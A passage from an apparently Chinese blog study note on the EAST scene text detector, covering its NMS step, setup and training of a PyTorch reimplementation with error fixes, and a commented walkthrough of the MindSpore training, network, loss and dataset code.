    ​ 将阈值应用于每个预测区域,其中得分超过预定义阈值的几何体被认为是有效的,并保存以供以后进行非最大值抑制。NMS 之后的结果被认为是管道的最终输出。ADAM 优化器,batch=24。


    ​ NMS:在假设附近像素的几何图形往往高度相关的情况下,我们建议逐行合并几何图形,在合并同一行中的几何图形时,我们将迭代合并当前遇到的几何图形和最后合并的几何图形。这种改进的技术在最佳场景中在 $O(n)$ 中运行。尽管它的最坏情况与原始情况相同,但只要局部性假设成立,该算法在实践中运行得足够快。
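​ 按这个思路可以写一个极简的逐行合并示意(假设 polys 已按行扫描顺序排好;iou() 是假设已有的四边形 IoU 函数,真实实现见后文用到的 lanms 库):

import numpy as np

def weighted_merge(g, p):
    # g、p 均为 9 维:8 个顶点坐标 + 1 个得分;坐标按得分加权平均,得分相加
    q = np.zeros(9)
    q[:8] = (g[8] * g[:8] + p[8] * p[:8]) / (g[8] + p[8])
    q[8] = g[8] + p[8]
    return q

def locality_aware_merge(polys, iou_thresh=0.5):
    # 只拿当前候选框和"最后一次合并的结果"比较:局部性假设成立时接近 O(n)
    merged, last = [], None
    for g in polys:
        if last is not None and iou(g, last) > iou_thresh:  # iou() 为假设的四边形 IoU 函数
            last = weighted_merge(g, last)
        else:
            if last is not None:
                merged.append(last)
            last = g
    if last is not None:
        merged.append(last)
    return merged  # 合并结果还要再过一遍标准 NMS 才是最终输出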


    未来研究的可能方向包括:

    • 调整几何公式,以允许直接检测弯曲文本;
    • 将所述检测器与文本识别器集成;
    • 将该思想扩展到通用对象检测。

    代码

    Pytorch

    Windows

    1. SakuraRiven/EAST: PyTorch Re-Implementation of EAST: An Efficient and Accurate Scene Text Detector (github.com) 加载仓库:

    png

    加载工程文件
2. conda 中新建一个 EAST 环境(conda create -n east python=3.7)并安装好:

      • pytorch
      • shapely
      • opencv-python 4.0.0.21
      • lanms,巨难装,用 pip install lanms-neo==1.0.2 -i https://pypi.tuna.tsinghua.edu.cn/simple
        • 如果是 wsl2 的 ubuntu, pip install lanms-proper

      设置好解释器

    png

    设置解释器
3. 下载模型:VGG16 和 EAST,将它们放在 pths/ 文件夹中

    png

    下载并放置预训练好的模型
4. Downloads - Incidental Scene Text - Robust Reading Competition (uab.es) 下载好 ICDAR 2015 Challenge 4 数据集,解压并按规则放在对应的文件夹中(原项目想放到工程外面,我改到了工程里面)

    png

    数据集官网

    png

    下载出这么四个压缩包

    png

    设置数据集地址

    png

    修改路径
5. 开跑 detect.py!

    png

    预测结果
6. 开跑 train.py!喜提错误:UnicodeDecodeError: ‘gbk’ codec can’t decode byte 0xbf in position 2: illegal multibyte sequence!在 dataset.py 中的第 382 行 with open(self.gt_files[index], 'r') as f: 改成 with open(self.gt_files[index], 'r', encoding='utf-8') as f: 填之。

7. 开跑 train.py!喜提错误:torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 1.50 GiB (GPU 0; 8.00 GiB total capacity; 3.14 GiB already allocated; 2.79 GiB free; 3.15 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation. See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF!在 train.py 里把 batch_size = 24 改成 batch_size = 4 填之。

8. 开跑 train.py!能跑了!

    WSL2

    装好环境

    conda create -n EAST python=3.7
    conda activate EAST
    pip install shapely
    pip install opencv-python==4.0.0.21
    pip install lanms-proper

    开跑!

    python3 train.py

    喜提错误:

      File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
    from .cv2 import *
    ImportError: libSM.so.6: cannot open shared object file: No such file or directory

    填:

    sudo apt update
    sudo apt install libsm6

    喜提错误:

    Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
    Please make sure libcudnn_cnn_infer.so.8 is in your library path!

补装 CUDA 工具链(这里缺的其实是 libcuda.so):

    sudo apt install nvidia-cuda-toolkit

    开跑!

    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...

    MindSpore

    读代码

    train.py

    好像跟其他的train.py差不多,设置完各种参数然后加载模型和优化器,开跑!

    各种细节都在src/里。

    from src.util import AverageMeter, get_param_groups
    from src.east import EAST, EastWithLossCell
    from src.logger import get_logger
    from src.initializer import default_recurisive_init
    from src.dataset import create_east_dataset
    from src.lr_scheduler import get_lr

    这段代码主要是对所需的模块进行引用,包括平均数计算、网络参数获取、EAST 模型、损失函数、日志记录、参数初始化、EAST 数据集和学习率调度器。

首先,从 src.util 模块中引入 AverageMeter() 和 get_param_groups() 方法,分别用于计算平均值和获取网络中需要训练的参数。

    接着,从src.east模块中引入EAST类和EastWithLossCell类,分别表示 EAST 模型和组合了损失函数的 EAST 模型。

    然后,从src.logger模块中引入get_logger()方法,用于获取日志记录器。

接下来,从 src.initializer 模块中引入 default_recurisive_init() 方法(仓库里就是这个拼写),用于对 EAST 模型进行默认的递归初始化。

    再者,从src.dataset模块中引入create_east_dataset()方法,用于创建 EAST 数据集。

    最后,从src.lr_scheduler模块中引入get_lr()方法,用于获取当前 epoch 的学习率。

    1. 设置 Parser 变量

    2. 设置分布式计算参数

    3. 设置 ModelArts 相关参数

    4. 设置相关路径(数据集、日志输出地址)

    5. 代码加速优化相关

    6. 加载模型

    7. 设置优化器

    8. 开始训练


    ​ 先使用 Argparse 模块创建一个 ArgumentParser 对象,用于解析命令行参数。

    ArgumentParser('mindspore icdar training'):创建一个 ArgumentParser 对象,并把 'mindspore icdar training' 作为参数传入,即设置程序的描述信息为 mindspore icdar training

    Parser 变量

    设备相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --device_target | str | Ascend | device where the code will be implemented. |
| --device_id | int | 0 | device id where the model will be implemented. |

    数据集相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --data_dir | str | './data/icdar2015/Training/' | Train dataset directory. |
| --per_batch_size | int | 8 | Batch size for Training. |
| --outputs_dir | str | 'outputs/' | output dir. |

    神经网络相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --pretrained_backbone | str | './data/vgg/XXX.ckpt' | The ckpt file of ResNet. |
| --resume_east | str |  | The ckpt file of EAST, which used to fine tune.(模型微调) |

    优化器学习率相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --lr_scheduler | str | 'my_lr' | Learning rate scheduler(学习率调整策略), options: exponential(指数衰减), cosine_annealing(余弦退火). Default: cosine_annealing |
| --lr | float | 0.001 | Learning rate. |
| --per_step | float | 2 | Learning rate change times. |
| --lr_gamma | float | 0.1 | Decrease lr by a factor of exponential lr_scheduler.(exponential 调度器的 lr 衰减系数) |
| --eta_min | float | 0. | Eta_min in cosine_annealing scheduler. |
| --t_max | int | 100 | T-max in cosine_annealing scheduler. |
| --max_epoch | int | 600 | Max epoch num to train the model. |
| --warmup_epochs | float(?) | 6 | Warmup epochs. |
| --weight_decay | float | 0.0005 | Weight decay factor. |

    损失函数相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --loss_scale | int | 1 | Static loss scale.(静态损失标度) |
| --resume_east | str | 7,7 | Epoch of changing of lr changing, split with ","(改变 lr 的 epoch 节点,用 "," 拆分) |

    日志相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --log_interval | int | 10 | Logging interval steps.(记录间隔步数) |
| --ckpt_path | str | 'outputs/' | Checkpoint save location. |
| --ckpt_interval | int | 1000(太大了吧,牛逼) | Save checkpoint interval.(保存检查点间隔) |
| --is_save_on_master | int | 1 | Save ckpt on master or all rank, 1 for master, 0 for all ranks.(master 和 rank 跟分布式计算有关) |

    分布式计算相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --is_distributed | int | 0 | Distribute train or not, 1 for yes, 0 for no. |
| --rank | int | 0 | Local rank of distributed. |
| --group_size | int | 1 | World size of device. |

    **profiler(性能分析器)**相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --need_profiler | int | 0 | Whether use profiler. 0 for no, 1 for yes. |

    modelArts相关:

| name | type | default | help |
| --- | --- | --- | --- |
| --is_modelArts | int | 0 | Trainning in modelArts or not, 1 for yes, 0 for no. |

    分布式计算

    这段代码主要是设置 Mindspore 的分布式计算的参数,我并不想动它。

args, _ = parser.parse_known_args()
args.device_id = int(os.getenv("DEVICE_ID", "0"))
args.rank = args.device_id

ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
if args.is_distributed:
    comm.init()
    args.rank = comm.get_rank()
    args.group_size = comm.get_group_size()
    ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
                                 device_num=args.group_size)

    ModelArts

    ModelArts 相关的参数,但是我把它设为 0 依然能跑?

    这段代码主要是用于处理在华为云ModelArts平台上运行时的数据和模型路径。

    首先判断args.is_modelArts是否为True,如果是,则意味着程序运行在华为云ModelArts平台上,需要对存储路径进行修改。

    接着,导入moxing库,这个库是华为云针对ModelArts平台的Python SDK,提供了丰富的API用于读写数据、上传下载文件等操作。

    然后,根据当前进程的编号(即args.rank变量)生成本地数据路径和本地模型路径,并将模型文件从远程路径(即args.pretrained_backbone)重命名为本地模型路径。

    接下来,使用mox.file.copy_parallel()方法将数据从远程路径(即args.data_dir)拷贝到本地数据路径。

    最后,将输出路径(即args.outputs_dir)设置为/cache目录下的子目录。在ModelArts平台上运行程序时,程序的输出也需要放在/cache目录下,以保证数据的持久化存储。

if args.is_modelArts:
    import moxing as mox

    local_data_url = os.path.join('/cache/data', str(args.rank))
    local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
    local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

    mox.file.rename(args.pretrained_backbone, local_ckpt_url)
    args.pretrained_backbone = local_ckpt_url

    mox.file.copy_parallel(args.data_dir, local_data_url)
    args.data_dir = local_data_url

    args.outputs_dir = os.path.join('/cache', args.outputs_dir)

    相关路径

    设置相关路径(数据集、日志):

args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

# 使用当前进程的编号(即 args.rank 变量)作为子目录名称,拼接成完整的输出文件夹路径
outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
# 获取当前时间作为子目录名称,再次拼接成完整的输出文件夹路径
args.outputs_dir = os.path.join(
    args.outputs_dir,
    datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
args.logger = get_logger(args.outputs_dir, args.rank)  # 调用 get_logger() 创建一个日志记录器,日志保存在 args.outputs_dir 目录下
args.logger.save_args(args)  # 将所有参数保存在日志文件中

    if __name__ == "__main__":

    优化

    进行代码加速优化

if args.need_profiler:
    # 创建一个性能分析器,并将结果保存在 args.outputs_dir 路径下
    profiler = Profiler(
        output_path=args.outputs_dir,
        is_detail=True,
        is_show_op_path=True)

# 创建一个 AverageMeter 对象用于记录损失值的平均值,以便后续输出和打印
loss_meter = AverageMeter('loss')

# 重置自动并行上下文
context.reset_auto_parallel_context()
parallel_mode = ParallelMode.STAND_ALONE
degree = 1
# 又是分布式计算相关……
if args.is_distributed:
    parallel_mode = ParallelMode.DATA_PARALLEL
    degree = args.group_size
context.set_auto_parallel_context(
    parallel_mode=parallel_mode,
    gradients_mean=True,
    device_num=degree)

    加载模型
network = EAST()  # 设置 network,加载 EAST 模型
# default is kaiming-normal
default_recurisive_init(network)  # 对 EAST 模型进行默认的递归初始化。这里使用的是 kaiming-normal(He 正态分布)初始化方法

# load pretrained_backbone
if args.pretrained_backbone:  # 如果不为 None,载入预训练的 backbone 模型
    parm_dict = load_checkpoint(args.pretrained_backbone)  # 加载模型参数
    load_param_into_net(network, parm_dict)  # 将模型参数加载到 network 上
    args.logger.info('finish load pretrained_backbone')  # 在日志中记录加载完成的信息

network = EastWithLossCell(network)  # 将 EAST 模型和损失函数结合,得到组合后的模型对象
if args.resume_east:  # 如果 args.resume_east 不为 None,继续训练之前保存的 EAST 模型(resume:恢复,继续)
    param_dict = load_checkpoint(args.resume_east)
    load_param_into_net(network, param_dict)
    args.logger.info('finish get resume east')

args.logger.info('finish get network')

# 载入数据集:调用 create_east_dataset(),传入图片文件夹路径、文本文件夹路径、批量大小、设备数量、进程编号等参数,
# 获取数据集以及数据总数,并在日志中记录加载完成的信息
ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
                                    device_num=args.group_size, rank=args.rank, is_training=True)
args.logger.info('Finish loading dataset')

# 计算每个 epoch 中的步数:数据总数 / 批量大小 / 设备数量
args.steps_per_epoch = int(
    data_size /
    args.per_batch_size /
    args.group_size)

if not args.ckpt_interval:
    # 如果 args.ckpt_interval 为空,则将其设置为每个 epoch 的步数
    args.ckpt_interval = args.steps_per_epoch
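拿 ICDAR 2015 训练集代一下数:1000 张图、per_batch_size=8、单卡 group_size=1,steps_per_epoch = int(1000 / 8 / 1) = 125,正好对得上后面炼出来的 checkpoint_east-600_125.ckpt(600 个 epoch、每个 epoch 125 步)。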

    设置优化器
# get learning rate
lr = get_lr(args)  # 获取当前 epoch 的学习率,并将其赋值给变量 lr
opt = Adam(  # 使用 Adam 优化器进行优化,优化对象为 EAST 模型中需要更新的参数
    params=get_param_groups(network),
    learning_rate=Tensor(
        lr,
        ms.float32))
loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True)  # 固定的损失缩放管理器
model = Model(network, optimizer=opt, loss_scale_manager=loss_scale)  # 用 Model() 从 EAST 模型对象和优化器拼出完整的训练模型,并传入损失缩放管理器
# 这样就生成了完整的训练模型对象,可以对其进行训练

    训练

    开始训练

network.set_train()  # 将网络设置为训练状态
# save the network model and parameters for subsequent fine-tuning
# 设置保存检查点的配置信息,包括保存检查点的步数和最大保存数量
config_ck = CheckpointConfig(
    save_checkpoint_steps=100,
    keep_checkpoint_max=1)
# group layers into an object with training and evaluation features
# 指定模型参数保存路径
save_ckpt_path = os.path.join(
    args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
# 使用 ModelCheckpoint() 创建一个保存训练模型参数的回调函数:
# prefix 指定保存文件名的前缀,directory 指定保存路径,config 指定保存配置信息
ckpoint_cb = ModelCheckpoint(
    prefix="checkpoint_east",
    directory=save_ckpt_path,
    config=config_ck)
# 回调函数列表:计时、损失监控、检查点保存
callback = [
    TimeMonitor(data_size=data_size),
    LossMonitor(),
    ckpoint_cb
]
# 调用 model.train() 进行训练,传入总 epoch 数、数据集以及之前定义的回调函数列表。
# 训练过程中启用数据集下沉模式(dataset_sink_mode=True)以提高训练效率
model.train(
    args.max_epoch,
    ds,
    callbacks=callback,
    dataset_sink_mode=True)
args.logger.info('==========end training===============')

    src/util.py

    定义了一些工具人类和函数,看不懂 orz:

• class AverageMeter:记录各个指标在训练过程中的平均值和当前值(典型写法见列表后的示意)
    • default_wd_filter():定义了一个默认的权重衰减过滤器函数,过滤掉不需要进行权重衰减的参数,例如偏置项和批归一化层中的偏置项和权重
    • get_param_groups():接受一个神经网络模型network作为参数,并将其可训练参数分成有权重衰减和无权重衰减两个组,并返回一个包含参数组信息的列表,每个参数组都包含paramsweight_decay两个键值对
    • class ShapeRecord:记录图像大小的类
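其中 AverageMeter 的套路比较固定,典型写法大致如下(示意,非仓库原码):

class AverageMeter:
    """记录某个指标的当前值、累计和与平均值"""

    def __init__(self, name):
        self.name = name
        self.reset()

    def reset(self):
        self.val = 0
        self.sum = 0
        self.count = 0
        self.avg = 0

    def update(self, val, n=1):
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count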

    src/east.py

    class EAST

    定义了一个 EAST 网络的类 EAST

class EAST(nn.Cell):
    def __init__(self):
        super(EAST, self).__init__()
        # 提取图像特征的模块,返回 5 组特征图用于后续处理
        self.extractor = VGG16FeatureExtraction()
        # 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
        self.merge = Merge()
        # 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数 score 和几何信息预测值 geo
        self.output = Output()

    def construct(self, x_1):
        # 通过 x_1 输入数据调用 self.extractor() 获取 5 组特征图
        f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
        # 将这些特征图传入 self.merge() 模块进行拼接,得到拼接后的特征图
        x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
        # 将该特征图输入到 self.output() 模块获得文本区域预测分数 score 和几何信息预测值 geo
        score, geo = self.output(x_1)

        return score, geo

    png

    代码对应的就是论文里的三个部分了:

    • Feature extractor stem (PVANet) - class VGG16FeatureExtraction
      • 提取图像特征的模块,返回 5 组特征图用于后续处理
    • Feature-merging branch - class Merge
      • 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
    • Output layer - class Output
      • 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数score和几何信息预测值geo

    class VGG16FeatureExtraction

    大致就是定义了一堆卷积核,然后按照论文里的方式一阵卷,返回 5 组特征图,但是特征图的标号好像跟论文里是反着来的。

class VGG16FeatureExtraction(nn.Cell):
    """VGG16FeatureExtraction for deeptext"""

    def __init__(self):
        super(VGG16FeatureExtraction, self).__init__()
        self.relu = nn.ReLU()
        self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
        self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

        self.conv1_1 = _conv(
            in_channels=3,
            out_channels=64,
            kernel_size=3,
            padding=1)

        ……

        self.conv5_3 = _conv(
            in_channels=512,
            out_channels=512,
            kernel_size=3,
            padding=1)
        self.cast = P.Cast()

    def construct(self, out):
        """ Construction of VGG """
        f_0 = out
        out = self.cast(out, mstype.float32)
        out = self.conv1_1(out)
        out = self.relu(out)
        out = self.conv1_2(out)
        out = self.relu(out)
        out = self.max_pool(out)

        ……

        out = self.max_pool(out)
        f_4 = out
        out = self.conv5_1(out)
        out = self.relu(out)
        out = self.conv5_2(out)
        out = self.relu(out)
        out = self.conv5_3(out)
        out = self.relu(out)
        out = self.max_pool(out)
        f_5 = out

        return f_0, f_2, f_3, f_4, f_5

    class Merge

P 是 MindSpore 中的一个模块,代表了运算符(operators)。我们可以通过 import mindspore.ops as P 来引入这个模块,从而使用其中定义的各种运算符函数,例如下面代码中使用的 Concat() 和 ResizeBilinear() 函数。

    也是定义一堆函数:

    • ResizeBilinear():是 MindSpore 中的一个图像处理函数,在图像上进行双线性插值,将输入图像缩放到指定大小。由于该模型中需要特征融合操作,因此使用该函数将不同尺度的特征图调整到相同尺寸,便于进行特征拼接。
    • concat():特征图拼接
    • nn.BatchNorm2d(128):是 MindSpore 中的一个二维批归一化函数,用于对网络模型中的卷积层或全连接层的输出进行归一化处理,以便更好地协调不同神经元之间的协同工作。
    • relu():激活函数
class Merge(nn.Cell):
    def __init__(self):
        super(Merge, self).__init__()

        self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
        self.bn1 = nn.BatchNorm2d(128)
        self.relu1 = nn.ReLU()
        self.conv2 = nn.Conv2d(
            128,
            128,
            3,
            padding=1,
            pad_mode='pad',
            has_bias=True)
        self.bn2 = nn.BatchNorm2d(128)
        self.relu2 = nn.ReLU()

        ……

    def construct(self, x, f1, f2, f3, f4):
        img_hight = P.Shape()(x)[2]
        img_width = P.Shape()(x)[3]

        out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
        out = self.concat((out, f3))
        out = self.relu1(self.bn1(self.conv1(out)))
        out = self.relu2(self.bn2(self.conv2(out)))

        out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
        out = self.concat((out, f2))
        out = self.relu3(self.bn3(self.conv3(out)))
        out = self.relu4(self.bn4(self.conv4(out)))

        out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
        out = self.concat((out, f1))
        out = self.relu5(self.bn5(self.conv5(out)))
        out = self.relu6(self.bn6(self.conv6(out)))

        out = self.relu7(self.bn7(self.conv7(out)))
        return out
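顺带一提,论文 feature-merging 分支里的 unpool 在这里就是用 P.ResizeBilinear 把特征图尺寸翻倍来实现的:f4 先放大到 1/16 与 f3 拼接,再依次放大到 1/8、1/4,每个阶段 concat 一次、卷两次,与前面的公式一一对应。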

    class Output
class Output(nn.Cell):
    def __init__(self, scope=512):
        super(Output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1)
        self.sigmoid1 = nn.Sigmoid()
        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = scope
        self.concat = P.Concat(axis=1)
        self.PI = 3.1415926535898

    def construct(self, x):
        score = self.sigmoid1(self.conv1(x))  # 文本区域得分
        loc = self.sigmoid2(self.conv2(x)) * self.scope  # 位置
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI  # 倾斜角度
        geo = self.concat((loc, angle))  # 边界框信息包含位置和倾斜角度
        return score, geo  # 最终返回文本区域得分和拼接后的边界框信息

    class EastLossBlock

    在该模块计算损失时,首先计算分类损失,即将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失。

    接着,将预测得到的位置信息和真实标注的位置信息分别拆分出来,通过计算交并比(IoU)和角度误差得到位置损失,最终通过加权平均作为总体的位置损失。其中,角度误差使用余弦相似度计算。

    在计算位置损失时,还需考虑训练集中的样本是否为真实文本区域,需将训练集中非文本区域处的位置信息、分类标注和对应的模型预测结果剔除掉,以避免这些数据对损失计算的干扰。

    最后将分类损失和位置损失加权求和,作为总体损失并返回。
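其中 Dice 系数损失的常见形式是(示意,具体以仓库里 DiceCoefficient 的实现为准):

$L_{cls}=1-\frac{2\sum_i \hat y_i y^*_i}{\sum_i \hat y_i+\sum_i y^*_i}$

$\hat y_i$ 为预测得分图、$y^*_i$ 为真实标注,对所有像素 $i$ 求和;在正负样本极不均衡的分数图上,它通常比逐像素交叉熵更稳。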

class EastLossBlock(nn.Cell):
    def __init__(self):
        super(EastLossBlock, self).__init__()
        self.split = P.Split(1, 5)
        self.min = MyMin()
        self.log = P.Log()
        self.cos = P.Cos()
        self.mean = P.ReduceMean(keep_dims=False)
        self.sum = P.ReduceSum()
        self.eps = 1e-5
        self.dice = DiceCoefficient()

    def construct(
            self,
            y_true_cls,
            y_pred_cls,
            y_true_geo,
            y_pred_geo,
            training_mask):
        ans = self.sum(y_true_cls)
        # 将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失
        classification_loss = self.dice(
            y_true_cls, y_pred_cls * (1 - training_mask))

        # n * 5 * h * w
        # 将预测得到的位置信息和真实标注的位置信息分别拆分出来
        d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
        d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
        area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
        area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
        w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
        h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

        area_intersect = w_union * h_union
        area_union = area_gt + area_pred - area_intersect
        # 通过计算交并比(IoU)和角度误差得到位置损失
        iou_loss_map = -self.log((area_intersect + 1.0) /
                                 (area_union + 1.0))  # iou_loss_map
        angle_loss_map = 1 - self.cos(theta_pred - theta_gt)  # angle_loss_map

        # 角度误差使用余弦相似度计算
        angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
        iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
        geo_loss = 10 * angle_loss + iou_loss

        return geo_loss + classification_loss
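可以和论文对一下账:geo_loss 里角度项前面的系数 10 就是前文的 $\lambda_\theta=10$;但分类损失这里用的是 Dice 系数,而不是论文的 balanced cross-entropy,算是实现上的一处替换。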

    class EastWithLossCell
class EastWithLossCell(nn.Cell):
    def __init__(self, network):
        super(EastWithLossCell, self).__init__()
        # 传入一个 EAST 模型,作为计算图中的网络模块
        self.east_network = network
        # 实例化 EastLossBlock 类,作为计算图中的损失函数模块
        self.loss = EastLossBlock()

    def construct(self, img, true_cls, true_geo, training_mask):
        '''
        img: 输入图片
        true_cls: 分类标注
        true_geo: 位置标注
        training_mask: 训练集中的掩码(用于过滤掉非真实文本区域的数据)
        '''
        # 调用计算图进行前向计算
        score, geometry = self.east_network(img)
        # 将计算得到的分类得分和位置信息分别传给损失函数模块,得到整体的损失值并返回
        loss = self.loss(
            true_cls,
            score,
            true_geo,
            geometry,
            training_mask)
        return loss

    src/dataset.py

    create_east_dataset()
def create_east_dataset(
        img_root,
        txt_root,
        batch_size,
        device_num,
        rank,
        is_training=True):
    # 实例化 ICDAREASTDataset 类,传入图片和文本标注的路径,用于读取并解析图像和标注
    east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
    # 生成分布式采样器,用于在多个设备之间对数据进行划分和分发
    distributed_sampler = DistributedSampler(
        len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

    trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25),  # 随机改变图像的亮度、对比度、饱和度和色调
                  CV.Rescale(1 / 255.0, 0),  # 将像素值缩放到 [0, 1]
                  CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),  # 图像归一化处理
                  CV.HWC2CHW()]  # 将图像的通道维度从 HWC(高×宽×通道数)顺序转换为 CHW(通道数×高×宽)顺序
    if is_training:  # 如果是训练模式
        dataset_column_names = [
            "image",  # 图像
            "score_map",  # 分类标注分数图
            "geo_map",  # 位置标注几何图
            "training_mask"]  # 训练集掩码
        # 调用 MindSpore 中的 GeneratorDataset 类生成数据集
        ds = de.GeneratorDataset(
            east_data,
            column_names=dataset_column_names,
            num_parallel_workers=32,  # 数据处理和增强过程中使用的并行线程数
            # sampler 参数指定数据采样器,即从数据集中选择数据样本的方式,
            # 这里使用的是前面提到的分布式采样器 distributed_sampler
            sampler=distributed_sampler)
        # 调用 map() 方法将数据集中的图像列传入变换列表中的操作进行增广
        ds = ds.map(
            operations=trans_list,
            input_columns=["image"],
            num_parallel_workers=8,
            python_multiprocessing=True)
        # 使用 batch() 方法按批量大小对数据集进行划分
        ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

    return ds, len(east_data)

    class ICDAREASTDataset
class ICDAREASTDataset:
    def __init__(self, img_path, gt_path, scale=0.25, length=512):
        super(ICDAREASTDataset, self).__init__()
        self.img_files = [os.path.join(
            img_path,
            img_file) for img_file in sorted(os.listdir(img_path))]
        self.gt_files = [
            os.path.join(
                gt_path,
                gt_file) for gt_file in sorted(
                os.listdir(gt_path))]
        self.scale = scale  # 缩放比例
        self.length = length  # 裁剪后的图像边长

    def __getitem__(self, index):
        with open(self.gt_files[index], 'r') as f:
            lines = f.readlines()
        vertices, labels = extract_vertices(lines)  # 从文本标注中提取文本区域的顶点坐标和标注

        img = Image.open(self.img_files[index])  # 读取图像
        img, vertices = adjust_height(img, vertices)  # 调整高度
        img, vertices = rotate_img(img, vertices)  # 随机旋转图像
        img, vertices = crop_img(img, vertices, labels, self.length)  # 将图像切割成指定长度的大小
        score_map, geo_map, ignored_map = get_score_geo(
            img, vertices, labels, self.scale, self.length)  # 分类标注分数图、位置标注几何图和忽略标注
        score_map = score_map.transpose(2, 0, 1)
        ignored_map = ignored_map.transpose(2, 0, 1)
        geo_map = geo_map.transpose(2, 0, 1)
        if np.sum(score_map) < 1:
            score_map[0, 0, 0] = 1
        return img, score_map, geo_map, ignored_map

    def __len__(self):
        return len(self.img_files)
